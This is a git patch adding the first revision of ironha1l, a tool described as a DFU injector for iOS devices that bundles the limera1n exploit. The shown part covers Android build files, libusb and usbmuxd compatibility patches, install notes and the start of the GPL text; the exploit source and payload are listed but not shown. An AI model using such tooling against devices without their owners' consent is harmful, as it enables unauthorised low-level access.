From 53e83229dc0d84b834bf8ed705f842e25e0d7aab Mon Sep 17 00:00:00 2001 From: Thireus Date: Wed, 10 Oct 2012 21:22:42 +0200 Subject: [PATCH] Initial ironha1l rev. --- ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk | 23 + ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk | 85 +++ ANDROID/Android.libusb.mk | 39 + ANDROID/README | 81 +++ ANDROID/libusb-1.0.3+.libusb.io.c.patch | 19 + ANDROID/libusb-1.0.9+.libusb.core.c.patch | 13 + ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch | 48 ++ ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch | 135 ++++ ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch | 55 ++ ...bmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch | 19 + ...xd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch | 19 + AUTHORS | 1 + Android.mk | 8 + GENERIC/README | 28 + .../usbmuxd-1.0.8.Modules.FindUSB.cmake.patch | 37 + .../usbmuxd-1.0.8.daemon.usb-linux.c.patch | 19 + INIT | 1 - INSTALL | 56 ++ LICENSE | 674 ++++++++++++++++++ Makefile.default | 108 +++ README | 53 ++ TODO | 24 + applications/Android.mk | 49 ++ applications/devices.c | 34 + applications/devices.h | 20 + applications/ironha1l.c | 391 ++++++++++ applications/ironha1l.h | 35 + common/common.c | 37 + common/common.h | 54 ++ configure | 179 +++++ libironha1l/Android.mk | 33 + libironha1l/libironha1l.c | 495 +++++++++++++ libironha1l/libironha1l.h | 56 ++ limera1n/limera1n.c | 135 ++++ limera1n/limera1n.h | 27 + limera1n/limera1n.payload | Bin 0 -> 2048 bytes 36 files changed, 3089 insertions(+), 1 deletion(-) create mode 100644 ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk create mode 100644 ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk create mode 100644 ANDROID/Android.libusb.mk create mode 100644 ANDROID/README create mode 100644 ANDROID/libusb-1.0.3+.libusb.io.c.patch create mode 100644 ANDROID/libusb-1.0.9+.libusb.core.c.patch create mode 100644 ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch create mode 100644 ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch create mode 100644 ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch create mode 100644 ANDROID/usbmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch create mode 100644 ANDROID/usbmuxd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch create mode 100644 AUTHORS create mode 100644 Android.mk create mode 100644 GENERIC/README create mode 100644 GENERIC/usbmuxd-1.0.8.Modules.FindUSB.cmake.patch create mode 100644 GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch delete mode 100644 INIT create mode 100644 INSTALL create mode 100644 LICENSE create mode 100644 Makefile.default create mode 100644 README create mode 100644 TODO create mode 100644 applications/Android.mk create mode 100644 applications/devices.c create mode 100644 applications/devices.h create mode 100644 applications/ironha1l.c create mode 100644 applications/ironha1l.h create mode 100644 common/common.c create mode 100644 common/common.h create mode 100755 configure create mode 100644 libironha1l/Android.mk create mode 100644 libironha1l/libironha1l.c create mode 100644 libironha1l/libironha1l.h create mode 100644 limera1n/limera1n.c create mode 100644 limera1n/limera1n.h create mode 100644 limera1n/limera1n.payload diff --git a/ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk b/ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk new file mode 100644 index 0000000..899d6ab --- /dev/null +++ b/ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk @@ -0,0 +1,23 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +LOCAL_PATH:= $(call my-dir) + +subdirs := $(addprefix $(LOCAL_PATH)/,$(addsuffix /Android.mk, libusb)) +include $(subdirs) diff --git a/ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk b/ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk new file mode 100644 index 0000000..89c2052 --- /dev/null +++ b/ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk @@ -0,0 +1,85 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +LOCAL_PATH:= $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_CFLAGS := -Dlibusbmuxd_EXPORTS -DHAVE_INOTIFY -O2 -fPIC -Wall -lpthread + +LOCAL_SRC_FILES:= \ + libusbmuxd/libusbmuxd.c \ + libusbmuxd/sock_stuff.c \ + common/utils.c + +LOCAL_C_INCLUDES += \ + external/ironha1l/usbmuxd_ironha1l/common + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libusb_ironha1l + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= libusbmuxd + +include $(BUILD_STATIC_LIBRARY) + + +include $(CLEAR_VARS) + +LOCAL_CFLAGS := -DUSBMUXD_DAEMON -DUSBMUXD_VERSION=\"1.0.8_ironha1l\" -O2 -Wall + +LOCAL_SRC_FILES:= \ + daemon/main.c \ + daemon/usb-linux.c \ + daemon/log.c \ + common/utils.c \ + daemon/device.c \ + daemon/client.c + +LOCAL_C_INCLUDES += \ + external/ironha1l/usbmuxd_ironha1l/common \ + external/ironha1l/usbmuxd_ironha1l/daemon \ + external/ironha1l/usbmuxd_ironha1l/libusbmuxd \ + external/ironha1l/libusb_ironha1l/libusb + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libusbmuxd libusb_ironha1l + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= usbmuxd + +include $(BUILD_EXECUTABLE) + + +include $(CLEAR_VARS) + +LOCAL_CFLAGS := -O2 -Wall -rdynamic + +LOCAL_SRC_FILES:= \ + tools/iproxy.c + +LOCAL_C_INCLUDES += \ + external/ironha1l/usbmuxd_ironha1l/libusbmuxd + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libusbmuxd + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= iproxy + +include $(BUILD_EXECUTABLE) diff --git a/ANDROID/Android.libusb.mk b/ANDROID/Android.libusb.mk new file mode 100644 index 0000000..61632af --- /dev/null +++ b/ANDROID/Android.libusb.mk @@ -0,0 +1,39 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +LOCAL_PATH:= $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_SRC_FILES:= \ + core.c \ + descriptor.c \ + io.c \ + sync.c \ + os/linux_usbfs.c \ + os/threads_posix.c + +LOCAL_C_INCLUDES += \ + external/ironha1l/libusb_ironha1l \ + external/ironha1l/libusb_ironha1l/libusb \ + external/ironha1l/libusb_ironha1l/libusb/os + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= libusb_ironha1l + +include $(BUILD_STATIC_LIBRARY) diff --git a/ANDROID/README b/ANDROID/README new file mode 100644 index 0000000..13d237a --- /dev/null +++ b/ANDROID/README @@ -0,0 +1,81 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +*** FOR YOUR INFORMATION *** + +THIS FILE IS FOR INFORMATION PURPOSE ONLY. + +*** ABOUT THIS DIRECTORY *** + +ALL FILES LOCATED IN THIS DIRECTORY ARE PART OF ironha1l Tool Suite. + +These files and patches are required for the ironha1l ANROID version. + +*** NOTES *** + +http://android.serverbox.ch/?p=151 + +RUN: + +cd external/libusb/ +./configure --host=arm-linux --disable-timerfd + +MacOS X: + +Error: /opt/local/include/dlfcn.h:41:32: error: AvailabilityMacros.h: No such file or directory + +sudo ln -s /usr/include/AvailabilityMacros.h /opt/local/include/. + +----- libusb 1.0.3+ specific errors: + +Problem: undefined reference to ‘TIMESPEC_TO_TIMEVAL’ + +Solution: add in libusb-1.0.*/libusb/io.c + +#ifndef TIMESPEC_TO_TIMEVAL +#define TIMESPEC_TO_TIMEVAL(tv, ts) \ + do { \ + (tv)->tv_sec = (ts)->tv_sec; \ + (tv)->tv_usec = (ts)->tv_nsec / 1000; \ + } while(0) +#endif /* end of TIMESPEC_TO_TIMEVAL */ + + +----- libusb 1.0.9 specific errors: + +Problem: error: 'LIBUSB_DESCRIBE' undeclared here (not in a function) + +Solution: add in external/libusb-1.0.9/libusb/core.c + +#define LIBUSB_DESCRIBE "" + + +Problem: error: undefined reference to 'usbi_mutex_init_recursive' + +Solution: + +nano external/libusb-1.0.9/libusb/Android.mk +ADD in LOCAL_SRC_FILES: os/threads_posix.c + + +USBMUXD: + +mkdir build +cd build +cmake -DCMAKE_SYSTEM_NAME=Linux .. diff --git a/ANDROID/libusb-1.0.3+.libusb.io.c.patch b/ANDROID/libusb-1.0.3+.libusb.io.c.patch new file mode 100644 index 0000000..8e60aff --- /dev/null +++ b/ANDROID/libusb-1.0.3+.libusb.io.c.patch @@ -0,0 +1,19 @@ +*** libusb-1.0.9/libusb/io.c 2012-04-20 08:44:27.000000000 +0200 +--- libusb_ironha1l/libusb/io.c 2012-07-18 15:37:48.000000000 +0200 +*************** +*** 36,41 **** +--- 36,49 ---- + + #include "libusbi.h" + ++ #ifndef TIMESPEC_TO_TIMEVAL ++ #define TIMESPEC_TO_TIMEVAL(tv, ts) \ ++ do { \ ++ (tv)->tv_sec = (ts)->tv_sec; \ ++ (tv)->tv_usec = (ts)->tv_nsec / 1000; \ ++ } while(0) ++ #endif /* end of TIMESPEC_TO_TIMEVAL */ ++ + /** + * \page io Synchronous and asynchronous device I/O + * diff --git a/ANDROID/libusb-1.0.9+.libusb.core.c.patch b/ANDROID/libusb-1.0.9+.libusb.core.c.patch new file mode 100644 index 0000000..599f78c --- /dev/null +++ b/ANDROID/libusb-1.0.9+.libusb.core.c.patch @@ -0,0 +1,13 @@ +*** libusb-1.0.9/libusb/core.c 2012-04-20 08:44:27.000000000 +0200 +--- libusb_ironha1l/libusb/core.c 2012-07-18 15:38:09.000000000 +0200 +*************** +*** 33,38 **** +--- 33,40 ---- + + #include "libusbi.h" + ++ #define LIBUSB_DESCRIBE "" ++ + #if defined(OS_LINUX) + const struct usbi_os_backend * const usbi_backend = &linux_usbfs_backend; + #elif defined(OS_DARWIN) diff --git a/ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch b/ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch new file mode 100644 index 0000000..f8aa54c --- /dev/null +++ b/ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch @@ -0,0 +1,48 @@ +*** usbmuxd-1.0.8/daemon/client.h 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/daemon/client.h 2012-07-31 10:43:36.000000000 +0200 +*************** +*** 25,30 **** +--- 25,67 ---- + #include + #include "usbmuxd-proto.h" + ++ #include ++ ++ typedef u_int32_t tcp_seq; ++ ++ /* ++ * TCP header. ++ * Per RFC 793, September, 1981. ++ */ ++ struct tcphdr_bsd { ++ u_short th_sport; /* source port */ ++ u_short th_dport; /* destination port */ ++ tcp_seq th_seq; /* sequence number */ ++ tcp_seq th_ack; /* acknowledgement number */ ++ #if __BYTE_ORDER == __LITTLE_ENDIAN ++ u_int th_x2:4, /* (unused) */ ++ th_off:4; /* data offset */ ++ #endif ++ #if __BYTE_ORDER == __BIG_ENDIAN ++ u_int th_off:4, /* data offset */ ++ th_x2:4; /* (unused) */ ++ #endif ++ u_char th_flags; ++ #define TH_FIN 0x01 ++ #define TH_SYN 0x02 ++ #define TH_RST 0x04 ++ #define TH_PUSH 0x08 ++ #define TH_ACK 0x10 ++ #define TH_URG 0x20 ++ #define TH_ECE 0x40 ++ #define TH_CWR 0x80 ++ #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) ++ ++ u_short th_win; /* window */ ++ u_short th_sum; /* checksum */ ++ u_short th_urp; /* urgent pointer */ ++ }; ++ + struct device_info; + struct mux_client; + diff --git a/ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch b/ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch new file mode 100644 index 0000000..5df6a0a --- /dev/null +++ b/ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch @@ -0,0 +1,135 @@ +*** usbmuxd-1.0.8/daemon/device.c 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/daemon/device.c 2012-07-30 15:52:15.000000000 +0200 +*************** +*** 148,154 **** + hdrlen = sizeof(struct version_header); + break; + case MUX_PROTO_TCP: +! hdrlen = sizeof(struct tcphdr); + break; + default: + usbmuxd_log(LL_ERROR, "Invalid protocol %d for outgoing packet (dev %d hdr %p data %p len %d)", proto, dev->id, header, data, length); +--- 148,154 ---- + hdrlen = sizeof(struct version_header); + break; + case MUX_PROTO_TCP: +! hdrlen = sizeof(struct tcphdr_bsd); + break; + default: + usbmuxd_log(LL_ERROR, "Invalid protocol %d for outgoing packet (dev %d hdr %p data %p len %d)", proto, dev->id, header, data, length); +*************** +*** 200,206 **** + + static int send_anon_rst(struct mux_device *dev, uint16_t sport, uint16_t dport, uint32_t ack) + { +! struct tcphdr th; + memset(&th, 0, sizeof(th)); + th.th_sport = htons(sport); + th.th_dport = htons(dport); +--- 200,206 ---- + + static int send_anon_rst(struct mux_device *dev, uint16_t sport, uint16_t dport, uint32_t ack) + { +! struct tcphdr_bsd th; + memset(&th, 0, sizeof(th)); + th.th_sport = htons(sport); + th.th_dport = htons(dport); +*************** +*** 216,222 **** + + static int send_tcp(struct mux_connection *conn, uint8_t flags, const unsigned char *data, int length) + { +! struct tcphdr th; + memset(&th, 0, sizeof(th)); + th.th_sport = htons(conn->sport); + th.th_dport = htons(conn->dport); +--- 216,222 ---- + + static int send_tcp(struct mux_connection *conn, uint8_t flags, const unsigned char *data, int length) + { +! struct tcphdr_bsd th; + memset(&th, 0, sizeof(th)); + th.th_sport = htons(conn->sport); + th.th_dport = htons(conn->dport); +*************** +*** 300,306 **** + conn->tx_win = 131072; + conn->rx_recvd = 0; + conn->flags = 0; +! conn->max_payload = USB_MTU - sizeof(struct mux_header) - sizeof(struct tcphdr); + + conn->ob_buf = malloc(CONN_OUTBUF_SIZE); + conn->ob_capacity = CONN_OUTBUF_SIZE; +--- 300,306 ---- + conn->tx_win = 131072; + conn->rx_recvd = 0; + conn->flags = 0; +! conn->max_payload = USB_MTU - sizeof(struct mux_header) - sizeof(struct tcphdr_bsd); + + conn->ob_buf = malloc(CONN_OUTBUF_SIZE); + conn->ob_capacity = CONN_OUTBUF_SIZE; +*************** +*** 464,470 **** + client_device_add(&info); + } + +! static void device_tcp_input(struct mux_device *dev, struct tcphdr *th, unsigned char *payload, uint32_t payload_length) + { + uint16_t sport = ntohs(th->th_dport); + uint16_t dport = ntohs(th->th_sport); +--- 464,470 ---- + client_device_add(&info); + } + +! static void device_tcp_input(struct mux_device *dev, struct tcphdr_bsd *th, unsigned char *payload, uint32_t payload_length) + { + uint16_t sport = ntohs(th->th_dport); + uint16_t dport = ntohs(th->th_sport); +*************** +*** 603,609 **** + return; + } + +! struct tcphdr *th; + unsigned char *payload; + uint32_t payload_length; + +--- 603,609 ---- + return; + } + +! struct tcphdr_bsd *th; + unsigned char *payload; + uint32_t payload_length; + +*************** +*** 616,629 **** + device_version_input(dev, (struct version_header *)(mhdr+1)); + break; + case MUX_PROTO_TCP: +! if(length < (sizeof(struct mux_header) + sizeof(struct tcphdr))) { + usbmuxd_log(LL_ERROR, "Incoming TCP packet is too small (%d)", length); + return; + } +! th = (struct tcphdr *)(mhdr+1); + payload = (unsigned char *)(th+1); +! payload_length = length - sizeof(struct tcphdr) - sizeof(struct mux_header); +! device_tcp_input(dev, (struct tcphdr *)(mhdr+1), payload, payload_length); + break; + default: + usbmuxd_log(LL_ERROR, "Incoming packet for device %d has unknown protocol 0x%x)", dev->id, ntohl(mhdr->protocol)); +--- 616,629 ---- + device_version_input(dev, (struct version_header *)(mhdr+1)); + break; + case MUX_PROTO_TCP: +! if(length < (sizeof(struct mux_header) + sizeof(struct tcphdr_bsd))) { + usbmuxd_log(LL_ERROR, "Incoming TCP packet is too small (%d)", length); + return; + } +! th = (struct tcphdr_bsd *)(mhdr+1); + payload = (unsigned char *)(th+1); +! payload_length = length - sizeof(struct tcphdr_bsd) - sizeof(struct mux_header); +! device_tcp_input(dev, (struct tcphdr_bsd *)(mhdr+1), payload, payload_length); + break; + default: + usbmuxd_log(LL_ERROR, "Incoming packet for device %d has unknown protocol 0x%x)", dev->id, ntohl(mhdr->protocol)); diff --git a/ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch b/ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch new file mode 100644 index 0000000..c06492f --- /dev/null +++ b/ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch @@ -0,0 +1,55 @@ +*** usbmuxd-1.0.8/daemon/main.c 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/daemon/main.c 2012-07-31 10:49:02.000000000 +0200 +*************** +*** 47,54 **** + #include "device.h" + #include "client.h" + +! static const char *socket_path = "/var/run/usbmuxd"; +! static const char *lockfile = "/var/run/usbmuxd.pid"; + + int should_exit; + int should_discover; +--- 47,54 ---- + #include "device.h" + #include "client.h" + +! static const char *socket_path = "/data/local/tmp/usbmuxd"; +! static const char *lockfile = "/data/local/tmp/usbmuxd.pid"; + + int should_exit; + int should_discover; +*************** +*** 147,153 **** + sigaction(SIGUSR2, &sa, NULL); + } + +! #if defined(__FreeBSD__) || defined(__APPLE__) + static int ppoll(struct pollfd *fds, nfds_t nfds, const struct timespec *timeout, const sigset_t *sigmask) + { + int ready; +--- 147,153 ---- + sigaction(SIGUSR2, &sa, NULL); + } + +! //#if defined(__FreeBSD__) || defined(__APPLE__) + static int ppoll(struct pollfd *fds, nfds_t nfds, const struct timespec *timeout, const sigset_t *sigmask) + { + int ready; +*************** +*** 160,166 **** + + return ready; + } +! #endif + + int main_loop(int listenfd) + { +--- 160,166 ---- + + return ready; + } +! //#endif + + int main_loop(int listenfd) + { diff --git a/ANDROID/usbmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch b/ANDROID/usbmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch new file mode 100644 index 0000000..c3293fb --- /dev/null +++ b/ANDROID/usbmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch @@ -0,0 +1,19 @@ +*** usbmuxd-1.0.8/libusbmuxd/libusbmuxd.c 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/libusbmuxd/libusbmuxd.c 2012-07-31 10:54:30.000000000 +0200 +*************** +*** 660,666 **** + } + #else + if (pthread_kill(devmon, 0) == 0) { +! pthread_cancel(devmon); + pthread_join(devmon, NULL); + } + #endif +--- 660,666 ---- + } + #else + if (pthread_kill(devmon, 0) == 0) { +! //pthread_cancel(devmon); + pthread_join(devmon, NULL); + } + #endif diff --git a/ANDROID/usbmuxd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch b/ANDROID/usbmuxd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch new file mode 100644 index 0000000..b704c8f --- /dev/null +++ b/ANDROID/usbmuxd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch @@ -0,0 +1,19 @@ +*** usbmuxd-1.0.8/libusbmuxd/usbmuxd-proto.h 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/libusbmuxd/usbmuxd-proto.h 2012-07-31 10:52:14.000000000 +0200 +*************** +*** 31,37 **** + #if defined(WIN32) || defined(__CYGWIN__) + #define USBMUXD_SOCKET_PORT 27015 + #else +! #define USBMUXD_SOCKET_FILE "/var/run/usbmuxd" + #endif + + #ifdef __cplusplus +--- 31,37 ---- + #if defined(WIN32) || defined(__CYGWIN__) + #define USBMUXD_SOCKET_PORT 27015 + #else +! #define USBMUXD_SOCKET_FILE "/data/local/tmp/usbmuxd" + #endif + + #ifdef __cplusplus diff --git a/AUTHORS b/AUTHORS new file mode 100644 index 0000000..7b0a600 --- /dev/null +++ b/AUTHORS @@ -0,0 +1 @@ +Pascal CLEMENT aka Thireus diff --git a/Android.mk b/Android.mk new file mode 100644 index 0000000..7c48ab7 --- /dev/null +++ b/Android.mk @@ -0,0 +1,8 @@ +LOCAL_PATH:= $(call my-dir) + +subdirs := $(addprefix $(LOCAL_PATH)/,$(addsuffix /Android.mk, libusb_ironha1l)) \ + $(addprefix $(LOCAL_PATH)/,$(addsuffix /Android.mk, libironha1l)) \ + $(addprefix $(LOCAL_PATH)/,$(addsuffix /Android.mk, applications)) \ + $(addprefix $(LOCAL_PATH)/,$(addsuffix /Android.mk, usbmuxd_ironha1l)) + +include $(subdirs) diff --git a/GENERIC/README b/GENERIC/README new file mode 100644 index 0000000..eddc5cd --- /dev/null +++ b/GENERIC/README @@ -0,0 +1,28 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +*** FOR YOUR INFORMATION *** + +THIS FILE IS FOR INFORMATION PURPOSE ONLY. + +*** ABOUT THIS DIRECTORY *** + +ALL FILES LOCATED IN THIS DIRECTORY ARE PART OF ironha1l Tool Suite. + +These files and patches are required for the ironha1l ANROID version. diff --git a/GENERIC/usbmuxd-1.0.8.Modules.FindUSB.cmake.patch b/GENERIC/usbmuxd-1.0.8.Modules.FindUSB.cmake.patch new file mode 100644 index 0000000..aa1eed2 --- /dev/null +++ b/GENERIC/usbmuxd-1.0.8.Modules.FindUSB.cmake.patch @@ -0,0 +1,37 @@ +*** usbmuxd-1.0.8/Modules/FindUSB.cmake 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/Modules/FindUSB.cmake 2012-07-30 17:56:20.000000000 +0200 +*************** +*** 10,25 **** + # Dependencies + + # pkg-config + libusb fails on FreeBSD, though libusb is in base +! if(NOT(${CMAKE_SYSTEM_NAME} MATCHES "FreeBSD")) +! # Use pkg-config to get hints about paths +! libfind_pkg_check_modules(USB_PKGCONF libusb-1.0>=1.0.3) +! # We want to look for libusb-1.0 + set(USB_LIBRARY_NAME usb-1.0) +! else() +! set(USB_PKGCONF_INCLUDE_DIRS /usr/include) +! set(USB_PKGCONF_LIBRARY_DIRS /usr/lib) +! set(USB_LIBRARY_NAME usb) +! endif() + + # Include dir + find_path(USB_INCLUDE_DIR +--- 10,25 ---- + # Dependencies + + # pkg-config + libusb fails on FreeBSD, though libusb is in base +! #if(NOT(${CMAKE_SYSTEM_NAME} MATCHES "FreeBSD")) +! # # Use pkg-config to get hints about paths +! # libfind_pkg_check_modules(USB_PKGCONF libusb-1.0>=1.0.3) +! # # We want to look for libusb-1.0 +! # set(USB_LIBRARY_NAME usb-1.0) +! #else() +! set(USB_PKGCONF_INCLUDE_DIRS ../../libusb_ironha1l/libusb) +! set(USB_PKGCONF_LIBRARY_DIRS ../../libusb_ironha1l/libusb/.libs) + set(USB_LIBRARY_NAME usb-1.0) +! #endif() + + # Include dir + find_path(USB_INCLUDE_DIR diff --git a/GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch b/GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch new file mode 100644 index 0000000..fff6b67 --- /dev/null +++ b/GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch @@ -0,0 +1,19 @@ +*** usbmuxd-1.0.8/daemon/usb-linux.c 2012-04-08 00:50:09.000000000 +0200 +--- usbmuxd_ironha1l/daemon/usb-linux.c 2012-07-30 18:05:47.000000000 +0200 +*************** +*** 29,35 **** + #include + #include + +! #include + + #include "usb.h" + #include "log.h" +--- 29,35 ---- + #include + #include + +! #include "libusb.h" + + #include "usb.h" + #include "log.h" diff --git a/INIT b/INIT deleted file mode 100644 index 8cf5f95..0000000 --- a/INIT +++ /dev/null @@ -1 +0,0 @@ -init. diff --git a/INSTALL b/INSTALL new file mode 100644 index 0000000..5482b02 --- /dev/null +++ b/INSTALL @@ -0,0 +1,56 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +*** BEFORE YOU START *** + +A working Internet connexion qui required by the configure script +to fetch additionnal tools. + +*** UNIX/LINUX/MacOS/FreeBSD *** + +./configure +make ironha1l usbmuxd iproxy devices + +Note: You can face some basic issues with libusb, especially if +libusb is already installed on the operating system. In this case +you must manually install the compiled version of libusb_ironha1l. + +*** ANDROID *** + +1. Put the ironha1l directory into your external/ folder of Android 4.x + WORKING_DIRECTORY source. + +2. Configure ironha1l for ANDROID + + ./configure ANDROID + +3. Compile from your Android WORKING_DIRECTORY root directory. + + make ironha1l usbmuxd iproxy devices + +4. Use adb of scp to upload files to a PATH bin directory of your Android + phone. + +*** ADDITIONAL NOTES **** + +You can also compile each tools provided by ironha1l Tool Suite separately. + +For example, if you only need ironha1 but not devices: + + make ironha1l diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..94a9ed0 --- /dev/null +++ b/LICENSE @@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that 